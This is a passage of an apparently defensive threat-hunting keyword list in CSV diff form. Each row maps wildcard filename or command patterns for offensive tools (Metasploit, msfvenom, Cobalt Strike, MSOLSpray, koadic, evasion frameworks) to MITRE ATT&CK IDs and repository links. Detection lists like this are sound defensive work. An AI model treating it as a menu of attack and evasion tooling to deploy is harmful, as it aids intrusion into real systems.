TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb --use-defaults*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb_helpers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfencode*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfJavaToolkit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*msf-json-rpc.*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*msf-json-rpc.ru*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msflag.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*msf-json-rpc.ru*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msflag.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*MsfModule*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*msfmodule.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*MsfModuleAsFunction*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*msfpattern.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfpayload*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfpc.sh*","offensive_tool_keyword","msfpc","A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework)","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","0","N/A","N/A","10","1127","274","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" -"*msfrelay.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msf-revhttps*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*MSFRottenPotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*MSFRottenPotato.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msf-sgn.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*msfupdate_spec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*msfpattern.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfpayload*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfpc.sh*","offensive_tool_keyword","msfpc","A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework)","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","0","N/A","N/A","10","1129","275","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" +"*msfrelay.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf-revhttps*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*MSFRottenPotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MSFRottenPotato.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf-sgn.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*msfupdate_spec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*msfvemonpayload*","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","36","8","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" "*msfvenom *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*msfvenom -*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfvenom -*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*msfvenom -*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfvenom -*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*--msfvenom *","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*Mshikaki.exe*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" "*Mshikaki-main*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" "*mshta/shellcode_inject*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*MSHTAStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*msi-search-main.zip*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*msLDAPDump.py*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*MSOfficeManipulator.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*msol_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*MSOLSpray *","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","0","N/A","10","8","734","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" -"*MSOLSpray.git*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","734","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" -"*MSOLSpray.ps1*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation 